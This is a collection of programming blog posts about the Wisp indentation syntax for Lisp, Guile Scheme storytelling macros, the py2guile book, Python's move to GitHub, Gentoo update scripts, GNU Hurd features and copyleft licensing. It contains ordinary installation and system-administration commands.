Essentially this dot-rule means that we mark variables at the beginning of lines instead of marking function calls, since in Lisp variables at the beginning of a line are much rarer than in other programming languages. In Lisp, assigning a value to a variable is a function call while it is a syntax element in many other languages. What would be a variable at the beginning of a line in other languages is a function call in Lisp.

(Optimize for the common case, not for the rare case)

4.2 : (the colon)

For double brackets and for some other cases we must have a way to mark indentation levels without any code. I chose the colon, because it is the most common non-alpha-numeric character in normal prose which is not already reserved as syntax by lisp when it is surrounded by whitespace, and because it already gets used for marking keyword arguments to functions in Emacs Lisp, so it does not add completely alien characters.

The function call via inline " : " is a limited generalization of using the colon to mark an indentation level: If we add a syntax-element, we should use it as widely as possible to justify the added syntax overhead.

But if you need to use : as variable or function name, you can still do that by escaping it with a backslash (example: "\:"), so this does not forbid using the character.

4.3 _ (the underscore)

In Python the whitespace hostile html already presents problems with sharing code - for example in email list archives and forums. But in Python the indentation can mostly be inferred by looking at the previous line: If that ends with a colon, the next line must be more indented (there is nothing to clearly mark reduced indentation, though). In wisp we do not have this help, so we need a way to survive in that hostile environment.

The underscore is commonly used to denote a space in URLs, where spaces are inconvenient, but it is rarely used in lisp (where the dash ("-") is mostly used instead), so it seems like a a natural choice.

You can still use underscores anywhere but at the beginning of the line. If you want to use it at the beginning of the line you can simply escape it by prefixing the first underscore with a backslash (example: "\___").

5 Background

A few months ago I found the readable Lisp project which aims at producing indentation based lisp, and I was thrilled. I had already done a small experiment with an indentation to lisp parser, but I was more than willing to throw out my crappy code for the well-integrated parser they had.

Fast forward half a year. It’s February 2013 and I started reading the readable list again after being out of touch for a few months because the birth of my daughter left little time for side-projects. And I was shocked to see that the readable folks had piled lots of additional syntax elements on their beautiful core model, which for me destroyed the simplicity and beauty of lisp. When language programmers add syntax using \\, $ and <>, you can be sure that it is no simple lisp anymore. To me readability does not just mean beautiful code, but rather easy to understand code with simple concepts which are used consistently. I prefer having some ugly corner cases to adding more syntax which makes the whole language more complex.

I told them about that and proposed a simpler structure which achieved almost the same as their complex structure. To my horror they proposed adding my proposal to readable, making it even more bloated (in my opinion). We discussed a long time - the current syntax for inline-colons is a direct result of that discussion in the readable list - then Alan wrote me a nice mail, explaining that readable will keep its direction. He finished with «We hope you continue to work with or on indentation-based syntaxes for Lisp, whether sweet-expressions, your current proposal, or some other future notation you can develop.»

It took me about a month to answer him, but the thought never left my mind (@Alan: See what you did? You anchored the thought of indentation based lisp even deeper in my mind. As if I did not already have too many side-projects… :)).

Then I had finished the first version of a simple whitespace-to-lisp preprocessor.

And today I added support for reading indentation based lisp from standard input which allows actually using it as in-process preprocessor without needing temporary files, so I think it is time for a real release outside my Mercurial repository.

So: Have fun with wisp v0.2 (tarball)!

PS: Wisp is linked in the comparisions of SRFI-110.

AnhangGröße
wisp-1.0.3.tar_.gz756.71 KB

Live stream from the Guile devroom at FOSDEM 2017!

Update: The recording is now online at ftp.fau.de/fosdem/2017/K.4.601/naturalscriptwritingguile.vp8.webm

Here’s the stream to the Guile devroom at #FOSDEM: https://live.fosdem.org/watch/k4601

Schedule (also on the FOSDEM page):

  • 09:45 10:30: Small languages panel Christopher Webber, Ludovic Courtès, Etiene Dalcol, Justin Cormack
  • 10:30 11:00: An introduction to functional package management with GNU Guix Ricardo Wurmus
  • 11:00 11:30: User interfaces with Guile and their application John Darrington
  • 11:30 12:00: Hacking with Guile… Alex Sassmannshausen
  • 12:00 12:45: Composing system services in GuixSD Ludovic Courtès
  • 12:45 13:15: Reproducible packaging and distribution of software with GNU Guix Pjotr Prins
  • 13:15 14:00: Network freedom, live at the REPL! Christopher Webber
  • 14:00 14:30: Natural script writing with Guile Arne Babenhauserheide (sadly I had to cancel my attendance, Christopher Allan Webber will present the slides — thank you!)
  • 14:30 15:00: Mes -- Maxwell's Equations of Software Jan Nieuwenhuizen (janneke)
  • 15:00 15:30: Adding GNU/Hurd support to GNU Guix and GuixSD Manolis Ragkousis
  • 15:30 16:00: Workflow management with GNU Guix Roel Janssen
  • 16:00 16:30: Getting started with guile-wiredtiger Amirouche Boubekki (amz3)
  • 16:30 17:00: Future of Guix Christopher Webber, Ludovic Courtès, Pjotr Prins, Ricardo Wurmus

Every one of these talks sounds awesome! Here’s where we get deep.

Using Guile Scheme Wisp for low ceremony embedded languages

Update 2020: In Dryads Wake I am starting a game using the way presented here to write dialogue-focused games with minimal ceremony. Demo: https://dryads-wake.1w6.org

Update 2018: Bitbucket is dead to me. You can find the source at https://hg.sr.ht/~arnebab/ews

Update 2017: A matured version of the work shown here was presented at FOSDEM 2017 as Natural script writing with Guile. There is also a video of the presentation (held by Chris Allan Webber; more info…). Happy Hacking!

Programming languages allow expressing ideas in non-ambiguous ways. Let’s do a play.

say Yes, I do!
Yes, I do!

This is a sketch of applying Wisp to a pet issue of mine: Writing the story of games with minimal syntax overhead, but still using a full-fledged programming language. My previous try was the TextRPG, using Python. It was fully usable. This experiment drafts a solution to show how much more is possible with Guile Scheme using Wisp syntax (also known an SRFI-119).

To follow the code here, you need Guile 2.0.11 on a GNU Linux system. Then you can install Wisp and start a REPL with

wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.6.tar.gz
tar xf wi*z; cd wi*/; ./c*e; make check; guile -L . --language=wisp

For finding minimal syntax, the first thing to do is to look at how such a structure would be written for humans. Let’s take the obvious and use Shakespeare: Macbeth, Act 1, Scene 1 (also it’s public domain, so we avoid all copyright issues). Note that in the original, the second and last non-empty line are shown as italic.

SCENE I. A desert place.

    Thunder and lightning. Enter three Witches

First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

Second Witch
    When the hurlyburly's done,
    When the battle's lost and won.

Third Witch
    That will be ere the set of sun.

First Witch
    Where the place?

Second Witch
    Upon the heath.

Third Witch
    There to meet with Macbeth.

First Witch
    I come, Graymalkin!

Second Witch
    Paddock calls.

Third Witch
    Anon.

ALL
    Fair is foul, and foul is fair:
    Hover through the fog and filthy air.

    Exeunt

Let’s analyze this: A scene header, a scene description with a list of people, then the simple format

person
    something said
    and something more

For this draft, it should suffice to reproduce this format with a full fledged programming language.

This is how our code should look:

First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

As a first step, let’s see how code which simply prints this would look in plain Wisp. The simplest way would just use a multiline string:

display "First Witch
    When shall we three meet again
    In thunder, lightning, or in rain?\n"

That works, but it’s not really nice. For one thing, the program does not have any of the semantic information a human would have, so if we wanted to show the First Witch in a different color than the Second Witch, we’d already be lost. Also throwing everything in a string might work, but when we need highlighting of certain parts, it gets ugly: We actually have to do string parsing by hand.

But this is Scheme, so there’s a better way. We can go as far as writing the sentences plainly, if we add a macro which grabs the variable names for us. We can do a simple form of this in just six short lines:

define-syntax-rule : First_Witch a ...
  format #t "~A\n" 
    string-join 
      map : lambda (x) (string-join (map symbol->string x))
            quote : a ...
      . "\n"

This already gives us the following syntax:

First_Witch
    When shall we three meet again
    In thunder, lightning, or in rain?

which prints

When shall we three meet again
In thunder, lightning, or in rain?

Note that :, . and , are only special when they are preceded by whitespace or are the first elements on a line, so we can freely use them here.

To polish the code, we could get rid of the underscore by treating everything on the first line as part of the character (indented lines are sublists of the main list, so a recursive syntax-case macro can distinguish them easily), and we could add highlighting with comma-prefixed parens (via standard Scheme preprocessing these get transformed into (unquote (...))). Finally we could add a macro for the scene, which creates these specialized parsers for all persons.

A completed parser could then read input files like the following:

SCENE I. A desert place.

    Thunder and lightning.

    Enter : First Witch
            Second Witch
            Third Witch

First Witch
    When shall ,(emphasized we three) meet again
    In thunder, lightning, or in rain?

Second Witch
    When the hurlyburly's done,
    When the battle's lost and won.

; ...

ALL
    Fair is foul, and foul is fair:
    Hover through the fog and filthy air.

action
    Exeunt

And with that the solution is sketched. I hope it was interesting for you to see how easy it is to create this!

Note also that this is not just a specialized text-parser. It provides access to all of Guile Scheme, so if you need interactivity or something like the branching story from TextRPG, scene writers can easily add it without requiring help from the core system. That’s part of the Freedom for Developers from the language implementors which is at the core of GNU Guile.

Don’t use this as data interchange format for things downloaded from the web, though: It does give access to a full Turing complete language. That’s part of its power which allows you to realize a simple syntax without having to implementent all kinds of specialized features which are needed for only one or two scenes. If you want to exchange the stories, better create a restricted interchange-format which can be exported from scenes written in the general format. Use lossy serializiation to protect your users.

And that’s all I wanted to say ☺

Happy Hacking!

PS: For another use of Shakespeare in programming languages, see the Shakespeare programming language. Where this article uses Wisp as a very low ceremony language to represent very high level concepts, the Shapespeare programming language takes the opposite approach by providing an extremely high-ceremony language for very low-level concepts. Thanks to ZMeson for reminding me ☺

AnhangGröße
2015-09-12-Sa-Guile-scheme-wisp-for-low-ceremony-languages.org6.35 KB
enter-three-witches.w1.23 KB

Going from Python to Guile Scheme - a natural progression

py2guile book

Python is the first language I loved. I dreamt in Python, I planned in Python, I thought I would never need anything else.

 - Free: html | pdf
 - Softcover: 14.95 €
   with pdf, epub, mobi
 - Source: download
   free licensed under GPL

I will show you why I love Python

Python is a language where I can teach a handful of APIs and cause people to learn most of the language as a whole.Raymond Hettinger (2011-06-20)

  • Pseudocode which runs
  • One way to do it
  • Hackable
  • Batteries and Bindings
  • Scales up

Where I hit its limits

Why, I feel all thin, sort of stretched if you know what I mean: like butter that has been scraped over too much bread. — Bilbo Baggins in “The Lord of the Rings”

  • Dual Syntax: What we teach new users is no longer what we use
  • Ceremony crops in
  • Complexity is on the rise

And how I lost its shackles

You must unlearn what you have learned. — Yoda in “The Empire Strikes Back“

Guile Scheme is the official GNU extension language, used for example in GNU Cash and GNU Guix and the awesome Lilypond.

Accompany me on a path beyond Python

Every sufficiently complex appli­ca­tion/langu­age/tool will either have to use Lisp or reinvent it the hard way.Greenspuns 10th rule

As free cultural work, py2guile is licensed under the GPLv3 or later. You are free to share, change, remix and even to resell it as long as you say that it’s from me (attribution) and provide the whole corresponding source under the GPL (sharealike).

For instructions on building the ebook yourself, see the README in the source.

Happy Hacking!

— Arne Babenhauserheide

Gratis py2guile from Freenet

py2guile book

py2guile is a book I wrote about Python and Guile Scheme. It’s selling at 14.95 €](https://www.epubli.de/shop/buch/47692) for the printed softcover.

To fight the new german data retention laws, you can get the ebook gratis: Just install Freenet, then the following links work:

Escape total surveillance and get an ebook about the official GNU extension language for free today!

Python chooses Github, therefore I’m releasing the py2guile PDF for free

py2guile book

Python is the first language I loved. I dreamt in Python, I planned in Python, I thought I would never need anything else.

  Download “Python to Guile” (pdf)

You can read more about this on the Mercurial mailing list.

 - Free: html | pdf
   preview edition
   (complete)

Yes, this means that with Guile I will contribute to a language developed via Git, but it won’t be using a proprietary platform.

If you like py2guile, please consider buying the book:

 - Softcover: 14.95 €
   with digital companion
 - Source: download
   free licensed under GPL

More information: draketo.de/py2guile

Commentary on Python and Github

Subjective popularity contest without robust data

I was curious why this happened so I read through PEP 0481. It's interesting that Git was chosen to replace Mercurial due to Git's greater popularity, yet a technical comparison was deemed as subjective. In fact, no actual comparison (of any kind) was discussed. What a shame. — Emmanuel Rosa on G+

yes. And the popularity contest wasn’t done in any robust way — they present values between 3x as popular and 18x as popular. That is a crazy margin of error — especially for a value on which to base a very disrupting decision. — my answer

No more dogfooding

Yesterday Python maintainers chose to move to GitHub and Git. Python is now developed using a C-based tool on a Ruby-based, unfree platform. And that changed my view on what’s happening in the community. Python no longer fosters its children and it even stopped dogfooding where its tools are as good as or better than other tools. I don’t think it will die. But I don’t bet on it for the future anymore. — EDIT to my answer on Quora “is Python a dying language?” which originally stated “it’s not dying, it’s maturing”.

Github invades your workflows

The PEP for github hedges somewhat by using github for code but not bug tracker. Not ideal considering BitKeeper, but a full on coup for GitHub. — Martin Owens

that’s something like basic self-defense, but my experience with projects who moved to GitHub is that GitHub soon starts to invade your workflows, changing your cooperation habits. At some point people realize that they can’t work well without GitHub anymore.

Not becoming dependent on GitHub while using it requires constant vigilance. Seeing how Python already switched to Git and GitHub because existing infrastructure wasn’t maintained does not sound like they will be able or willing to put in the work to keep independent. — my answer on G+

Foreboding since 2014

I was already pretty disappointed when I heard that Python is moving to Git. Seeing it choose the proprietary platform is an even sadder choice from my perspective. Two indicators for a breakage in the culture of the project.

For me that’s a reason to leave Python. Though it’s not like I did not get a foreboding of that. It’s why I started learning Guile Scheme in 2013 — and wrote about the experience.

I will still use Python for many practical tasks — it acquired the momentum for that, especially in science (I was a champion for Python in the institute, which is now replacing Matlab and IDL for many people here, and I will be teaching Python starting two weeks from now). I think it will stay strong for many years; a good language to start and a robust base for existing programs. But with what I learned the past years, Python is no longer where I place my bets. — slightly adjusted version of my post on the Mercurial mailing list.

Popularity without robust data instead of quality

(this is taken from a message I wrote to Brett, so I don’t have to say later that I stayed silent while Python went down. I got a nice answer, and despite the disagreement we said a friendly good bye)

Back when I saw that Python might move to git, I silently resigned and stopped caring to some degree. I have seen a few projects move to Git in the past years (and in every project problems remained even years after the switch), so when it came to cPython, the quarrel with git-fans just didn’t feel worthwhile anymore.

Seeing Python choose GitHub with the notion of “git is 3x to 18x more popular than Mercurial and free solutions aren’t better than GitHub” makes me lose my trust in the core development community, though.

PEP 481 states, that it is about the quality of the tooling, but it names the popularity numbers quite prominently: python.org/dev/peps/pep-0481/

If they are not relevant, they shouldn’t be included, but they are included, so they seem to be relevant to the decision. And “the best tooling” is mostly subjective, too — which is shown in the PEP itself which mostly talks about popularity, not quality. It even goes into length about how to avoid many of the features of GitHub.

I’ve seen quite a few projects try to avoid lock-in to GitHub. None succeeded. Not even in one where two of about six active developers were deeply annoyed by GitHub. This is exactly what the scipy part of the PEP describes: lock-in due to group effects.

Finally, using hg-git is by far not seamless. I use it for several projects, and when the repositories become big (as cPython’s is), the overhead of the conversion becomes a major hassle. It works, but native Mercurial would be much more efficient. When pushing takes minutes, you start to think twice about whether you’ll just do the quick fix right now. Not to forget that at some point people start to demand signing of commits in git-style (not possible with hg-git, you can only sign commits mercurial-style) as well as other gitologisms (which have an analogue in Mercurial but aren’t converted by hg-git).

Despite my disappointment, I wish you all the best. Python is a really cool language. It’s the first one I loved and will always stay dear to me, so I’m happy that you work on it — and I hope you keep it up.

So, I think this is goodbye. A bit melancholic, but that’s how that goes.

Good luck to you in your endeavors,
Arne Babenhauserheide

Enough negativity

And that’s enough negativity from me.

Thank you, Brett, for reminding me that even though we might disagree, it’s important to remember that people in the project are hit by negativity much harder than it feels for the one who writes.

For my readers: If that also happened to you one time or the other, please read his article:

How I stay happy making open source software

Thank you, Brett. Despite everything I wrote here, I still think that Python is a great project, and it got many things right — some of which are things which are at least as important as code but much less visible, like having a large, friendly community.

I’m happy that Python exists, and I hope that it keeps going. And where I use programming to make a living, I’m glad when I can do it in Python. Despite all my criticism, I consider Python as the best choice for many tasks, and this is also written in py2guile: almost the the first half of the book talks about the strengths of Python. Essentially I could not criticize Python as strongly as I’m doing it here if I did not like it so much. Keep that in mind when you think about what you read.

Also Brett now published an article where he details his decision to move to GitHub. It is a good read: The history behind the decision to move Python to GitHub — Or, why it took over a year for me to make a decision

For me, Gentoo is about *convenient* choice

It's often said, that Gentoo is all about choice, but that doesn't quite fit what it is for me.

After all, the highest ability to choose is Linux from scratch and I can have any amount of choice in every distribution by just going deep enough (and investing enough time).

What really distinguishes Gentoo for me is that it makes it convenient to choose.

Since we all have a limited time budget, many of us only have real freedom to choose, because we use Gentoo which makes it possible to choose with the distribution-tools. Therefore only calling it “choice” doesn't ring true in general - it misses the reason, why we can choose.

So what Gentoo gives me is not just choice, but convenient choice.

Some examples to illustrate the point:

KDE 4 without qt3

I recently rebuilt my system after deciding to switch my disk layout (away from reiserfs towards a simple ext3 with reiser4 for the portage tree). When doing so I decided to try to use a "pure" KDE 4 - that means, a KDE 4 without any remains from KDE3 or qt3.

To use kde without any qt3 applications, I just had to put "-qt3" and "-qt3support" into my useflags in /etc/make.conf and "emerge -uDN world" (and solve any arising conflicts).

Imagine doing the same with a (K)Ubuntu...

Emacs support

Similarly to enable emacs support on my GentooXO (for all programs which can have emacs support), I just had to add the "emacs" useflag and "emerge -uDN world".

Selecting which licenses to use

Just add

ACCEPT_LICENSE="-* @FSF-APPROVED @FSF-APPROVED-OTHER"

to your /etc/make.conf to make sure you only get software under licenses which are approved by the FSF.

For only free licenses (regardless of the approved state) you can use:

ACCEPT_LICENSE="-* @FREE"

All others get marked as masked by license. Default (no ACCEPT_LICENSE in /etc/make.conf) is “* -@EULA”: No unfree software. You can check your setting via emerge --info | grep ACCEPT_LICENSE. More information…

One program (suite) in testing, but the main system rock stable

Another part where choosing is made convenient in Gentoo are testing and unstable programs.

I remember my pain with a Kubuntu, where I wanted to use the most recent version of Amarok. I either had to add a dedicated Amarok-only testing repository (which I'd need for every single testing program), or I had to switch my whole system into testing. I did the latter and my graphical package manager ceased to work. Just imagine how quickly I ran back to Gentoo.

And then have a look at the ease of deciding to take one package into testing in Gentoo:

  • emerge --autounmask-write =cathegory/package-version
  • etc-update
  • emerge =cathegory/package-version

EDIT: Once I had a note here “It would be nice to be able to just add the missing dependencies with one call”. This is now possible with --autounmask-write.

And for some special parts (like KDE 4) I can easily say something like

  • ln -s /usr/portage/local/layman/kde-testing/Documentation/package.keywords/kde-4.3.keywords /etc/portage/package.keywords/kde-4.3.keywords

(I don't have the kde-testing overlay on my GentooXO, where I write this post, so the exact command might vary slightly)

Closing remarks

So to finish this post: For me, Gentoo is not only about choice. It is about convenient choice.

And that means: Gentoo gives everybody the power to choose.

I hope you enjoy it as I do!

Automatic updates in Gentoo GNU/Linux

Update 2016: I nowadays just use emerge --sync; emerge @security

To keep my Gentoo up to date, I use daily and weekly update scripts which also always run revdep-rebuild after the saturday night update :)

My daily update is via pkgcore to pull in all important security updates:

pmerge @glsa

That pulls in the Gentoo Linux Security Advisories - important updates with mostly short compile time. (You need pkgcore for that: "emerge pkgcore")

Also I use two cron scripts.

Note: It might be useful to add the lafilefixer to these scripts (source).

The following is my daily update (in /etc/cron.daily/update_glsa_programs.cron )

Daily Cron

\#! /bin/sh

\### Update the portage tree and the glsa packages via pkgcore

\# spew a status message
echo $(date) "start to update GLSA" >> /tmp/cron-update.log

\# Sync only portage
pmaint sync /usr/portage

\# security relevant programs
pmerge -uDN @glsa > /tmp/cron-update-pkgcore-last.log || cat \
    /tmp/cron-update-pkgcore-last.log >> /tmp/cron-update.log  

\# And keep everything working
revdep-rebuild

\# Finally update all configs which can be updated automatically
cfg-update -au

echo $(date) "finished updating GLSA" >> /tmp/cron-update.log

And here's my weekly cron - executed every saturday night (in /etc/cron.weekly/update_installed_programs.cron ):

Weekly Cron

\#!/bin/sh                                                     

\### Update my computer using pgkcore, 
\### since that also works if some dependencies couldn't be resolved.

\# Sync all overlays
eix-sync

\## First use pkgcore
\# security relevant programs (with build-time dependencies (-B))
pmerge -BuD @glsa

\# system, world and all the rest
pmerge -BuD @system
pmerge -BuD @world
pmerge -BuD @installed

\# Then use portage for packages pkgcore misses (inlcuding overlays) 
\# and for *EMERGE_DEFAULT_OPTS="--keep-going"* in make.conf 
emerge -uD @security
emerge -uD @system
emerge -uD @world
emerge -uD @installed

\# And keep everything working
emerge @preserved-rebuild
revdep-rebuild

\# Finally update all configs which can be updated automatically
cfg-update -au

pkgcore vs. eix → pix (find packages in Gentoo)

For a long time it bugged me, that eix uses a seperate database which I need to keep up to date. But no longer: With pkgcore as fast as it is today, I set up pquery to replace eix.

The result is pix:

alias pix='pquery --raw -nv --attr=keywords'

(put the above in your ~/.bashrc)

The output looks like this:

$ pix pkgcore
 * sys-apps/pkgcore
    versions: 0.5.11.6 0.5.11.7
    installed: 0.5.11.7
    repo: gentoo
    description: pkgcore package manager
    homepage: http://www.pkgcore.org
    keywords: ~alpha ~amd64 ~arm ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc ~x86

It’s still a bit slower than eix, but it operates directly on the portage tree and my overlays — and I no longer have to use eix-sync for syncing my overlays, just to make sure eix is updated.

Some other treats of pkgcore

Aside from pquery, pkgcore also offers pmerge to install packages (almost the same syntax as emerge) and pmaint for synchronizing and other maintenance stuff.

From my experience, pmerge is hellishly fast for simple installs like pmerge kde-misc/pyrad, but it sometimes breaks with world updates. In that case I just fall back on portage. Both are Python, so when you have one, adding the other is very cheap (spacewise).

Also pmerge has the nice pmerge @glsa feature: Get Gentoo Linux security updates. Due to it’s almost unreal speed (compared to portage) checking for security updates now doesn’t hurt anymore.

$ time pmerge -p @glsa
 * Resolving...
Nothing to merge.

real    0m1.863s
user    0m1.463s
sys     0m0.100s

It differs from portage in that you call world as set explicitely — either via a command like pmerge -aus world or via pmerge -au @world.

pmaint on the other hand is my new overlay and tree synchronizer. Just call pmaint sync to sync all, or pmaint sync /usr/portage to sync only the given overlay (in this case the portage tree).

Caveeats

Using pix as replacement of eix isn’t yet perfect. You might hit some of the following:

  • pix always shows all packages in the tree and the overlays. The keywords are only valid for the highest version, though. marienz from #pkgcore on irc.freenode.net is working on fixing that.

  • If you only want to see the packages which you can install right away, just use pquery -nv. pix is intended to mimik eix as closely as possible, so I don’t have to change my habits ;) If it doesn’t fit your needs, just change the alias.

  • To search only in your installed packages, you can use pquery --vdb -nv.

  • Sometimes pquery might miss something in very broken overlay setups (like my very grown one). In that case, please report the error in the bugtracker or at #pkgcore on irc.freenode.net:

    23:27 <marienz> if they're reported on irc they're probably either fixed pretty quickly or they're forgotten
    23:27 <marienz> if they're reported in the tracker they're harder to forget but it may take longer before they're noticed

I hope my text helps you in changing your Gentoo system further towards the system which fits you best!

No, it ain’t “forever” (GNU Hurd code_swarm from 1991 to 2010)

If the video doesn’t show, you can also download it as Ogg Theora & Vorbis “.ogv” or find it on youtube.

This video shows the activity of the Hurd coders and answers some common questions about the Hurd, including “How stagnated is Hurd compared to Duke Nukem Forever?”. It is created directly from commits to Hurd repositories, processed by community codeswarm.

Every shimmering dot is a change to a file. These dots align around the coder who did the change. The questions and answers are quotes from todays IRC discussions (2010-07-13) in #hurd at irc.freenode.net.

You can clearly see the influx of developers in 2003/2004 and then again a strenthening of the development in 2008 with less participants but higher activity than 2003 (though a part of that change likely comes from the switch to git with generally more but smaller commits).

I hope you enjoyed the high-level look on the activity of the Hurd project!

PS: The last part is only the information title with music to honor Sean Wright for allowing everyone to use and adapt his Album Enchanted.

Some technical advantages of the Hurd

→ An answer to just accept it, truth hurds, where Flameeyes told his reasons for not liking the Hurd and asked for technical advantages (and claimed, that the Hurd does not offer a concept which got incorporated into other free software, contributing to other projects). Note: These are the points I see. Very likely there are more technical advantages which I don’t see well enough to explain them.

The translator system in the Hurd is a simple concept that makes many tasks easy, which are complex with Linux (like init, network transparency, new filesystems, …). Additionally there are capabilities (give programs only the access they need - adjusted at runtime), subhurds and (academic) memory management.

Information for potential testers: The Hurd is already usable, but it is not yet in production state. It progressed a lot during the recent years, though. Have a look at the status report if you want to see if it’s already interesting for you. See running the Hurd for testing it yourself.

Table of Contents:

Influence on other systems: FUSE in Linux and limited translators in NetBSD

Firstoff: FUSE is essentially an implementation of parts of the translator system (which is the main building block of the Hurd) to Linux, and NetBSD recently got a port of the translators system of the Hurd. That’s the main contribution to other projects that I see.

As an update in 2015: A pretty interesting development in the past few years is that the systemd developers have been bolting features onto Linux which the Hurd already provided 15 years ago. Examples: socket-activation provides on-demand startup like passive translators, but as crude hack piggybacked on dbus which can only be used by dbus-aware programs while passive translators can be used by any program which can access the filesystem, calling priviledged programs via systemd provides jailed priviledge escalation like adding capabilities at runtime, but as crude hack piggybacked on dbus and specialized services.

That means, there is a need for the features of the Hurd, but instead of just using the Hurd, where they are cleanly integrated, these features are bolted onto a system where they do not fit and suffer from bad performance due to requiring lots of unnecessary cruft to circumvent limitations of the base system. The clean solution would be to just set 2-3 full-time developers onto the task of resolving the last few blockers (mainly sound and USB) and then just using the Hurd.

translator-based filesystem

On the bare technical side, the translator-based filesystem stands out: The filesystem allows for making arbitrary programs responsible for displaying a given node (which can also be a directory tree) and to start these programs on demand. To make them persistent over reboots, you only need to add them to the filesystem node (for which you need the right to change that node). Also you can start translators on any node without having to change the node itself, but then they are not persistent and only affect your view of the filesystem without affecting other users. These translators are called active, and you don’t need write permissions on a node to add them.

network transparency on the filesystem level

The filesystem implements stuff like Gnome VFS (gvfs) and KDE network transparency on the filesystem level, so those are available for all programs. And you can add a new filesystem as simple user, just as if you’d write into a file “instead of this node, show the filesystem you get by interpreting file X with filesystem Y” (this is what you actually do when setting a translator but not yet starting it (passive translator)).

One practical advantage of this is that the following works:

settrans -a ftp\: /hurd/hostmux /hurd/ftpfs /
dpkg -i ftp://ftp.gnu.org/path/to/*.deb

This installs all deb-packages in the folder path/to on the FTP server. The shell sees normal directories (beginning with the directory “ftp:”), so shell expressions just work.

You could even define a Gentoo mirror translator (settrans mirror\: /hurd/gentoo-mirror), so every program could just access mirror://gentoo/portage-2.2.0_alpha31.tar.bz2 and get the data from a mirror automatically: wget mirror://gentoo/portage-2.2.0_alpha31.tar.bz2

unionmount as user

Or you could add a unionmount translator to root which makes writes happen at another place. Every user is able to make a readonly system readwrite by just specifying where the writes should go. But the writes only affect his view of the filesystem.

persistent translators, started when needed

Starting a network process is done by a translator, too: The first time something accesses the network card, the network translator starts up and actually provides the device. This replaces most initscripts in the Hurd: Just add a translator to a node, and the service will persist over restarts.

It’s a surprisingly simple concept, which reduces the complexity of many basic tasks needed for desktop systems.

And at its most basic level, Hurd is a set of protocols for messages which allow using the filesystem to coordinate and connect processes (along with helper libraries to make that easy).

add permissions at runtime (capabilities)

Also it adds POSIX compatibility to Mach while still providing access to the capabilities-based access rights underneath, if you need them: You can give a process permissions at runtime and take them away at will. For example you can start all programs without permission to use the network (or write to any file) and add the permissions when you need them.

Different from Linux, you do not need to start privileged and drop permissions you do not need (goverened by the program which is run), but you start as unprivileged process and add the permissions you need (governed by an external process):

groups # → root
addauth -p $(ps -L) -g mail
groups # → root mail 

lightweight virtualization

And then there are subhurds (essentially lightweight virtualization which allows cutting off processes from other processes without the overhead of creating a virtual machine for each process). But that’s an entire post of its own…

Easy to test lowlevel hacking

And the fact that a translator is just a simple standalone program means that these can be shared and tested much more easily, opening up completely new options for lowlevel hacking, because it massively lowers the barrier of entry.

For example the current Hurd can use the Linux network device drivers and run them in userspace (via DDE), so you can simply restart them and a crashing driver won’t bring down your system.

subdividing memory management

And then there is the possibility of subdividing memory management and using different microkernels (by porting the Hurd layer, as partly done in the NetBSD port), but that is purely academic right now (search for Viengoos to see what its about).

Summary

So in short:

The translator system in the Hurd is a simple concept that makes many tasks easy, which are complex with Linux (like init, network transparency, new filesystems, …). Additionally there are capabilities (give programs only the access they need - adjusted at runtime), subhurds and (academic) memory management.

Best wishes,
Arne

PS: I decided to read flameeyes’ post as “please give me technical reasons to dispell my emotional impression”.

PPS: If you liked this post, it would be cool if you’d flattr it: Flattr this

PPPS: Additional information can be found in Gaël Le Mignot’s talk notes, in niches for the Hurd and the GNU Hurd documentation pages.

P4S: This post is also available in the Hurd Staging Wiki.

(A)GPL as hack on a Python-powered copyright system

AGPL is a hack on copyright, so it has to use copyright, else it would not compile/run.

All the GPL licenses are a hack on copyright. They insert a piece of legal code into copyright law to force it to turn around on itself.

You run that on the copyright system, and it gives you code which can’t be made unfree.

To be able to do that, it has to be written in copyright language (else it could not be interpreted).

my_code = "<your code>"

def AGPL ( code ): 
    """
    >>> is_free ( AGPL ( code ) )
    True
    """
    return eval (
        transform_to_free ( code ) )

copyright ( AGPL ( my_code ) )

You pass “AGPL ( code )” to the copyright system, and it ensures the freedom of the code.

The transformation means that I am allowed to change your code, as long as I keep the transformation, because copyright law sees only the version transformed by AGPL, and that stays valid.

Naturally both AGPL definition and the code transformed to free © must be ©-compatible. And that means: All rights reserved. Else I could go in and say: I just redefine AGPL and make your code unfree without ever touching the code itself (which is initially owned by you by the laws of ©):

def AGPL ( code ): 
    """ 
    >>> is_free ( AGPL ( code ) )
    False
    """
    return eval (
        transform_to_mine ( code ) )

In this Python-powered copyright-system, I could just define this after your definition but before your call to copyright(), and all calls to APGL ( code ) would suddenly return code owned by me.

Or you would have to include another way of defining which exact AGPL you mean. Something like “AGPL, but only the versions with the sha1 hashes AAAA BBBB and AABA”. cc tries to use links for that, but what do you do if someone changes the DNS resolution to point creativecommons.org to allmine.com? Whose DNS server is right, then - legally speaking?

In short: AGPL is a hack on copyright, so it has to use copyright, else it would not compile/run.

Are there 10x programmers?

→ An answer I wrote to this question on Quora.

Software Engineering: What is the truth of 10x programmers?
Do they really exist?…

Let’s answer the other way round: I once had to take heavy anti-histamines for three weeks. My mind was horribly hazy from that, and I felt awake only about two hours per day. However I spent every day working on a matrix multiplication problem.

It was three weeks of failure, because I just could not grasp the problem. I was unable to hold it in my mind.

Then I could finally drop the anti-histamine.

On the first day I solved the problem on my way to buy groceries. On the second day I planned the implementation while walking for two hours . On the third day I finished the program.

This taught me to accept it when people don’t manage to understand things I understand: I know that the brain can actually have different paces and that complexity which feels easy to me might feel infeasible for others. It sure did feel that way to me while I took the anti-histamines.

It also taught me to be humble: There might be people to whom my current state of mind feels like taking anti-histamines felt to me. I won’t be able to even grasp the patterns they see, because they can use another level of complexity.

To get a grasp of the impact, I ask myself a question: How would an alien solve problems who can easily keep 100 things in its mind — instead of the 4 to 7 which is the rough limit for humans?

BY-SA and GPL: creativecommons closed the chasm in the sharealike/copyleft community

This is the biggest news item for free culture and free software in the past 5 years: The creativecommons attribution sharealike license is now one-way compatible to the GPL — see the message from creativecommons and from the Free Software Foundation.

Some license compatibility legalese might sound small, but the impact of this is hard to overestimate.

(I’ll now revise some of my texts about licensing — CC BY-SA got a major boost in utility because it not longer excludes usage in copyleft documents which need the source to have a defended sharealike clause)

Communicating your project: honest marketing for free software projects

You have an awesome project, but you see people reach for inferior tools? There are people using your project, but you can’t reach the ones you care about? Read on for a way to ensure that your communication doesn’t ruin your prospects but instead helps your project to shine.

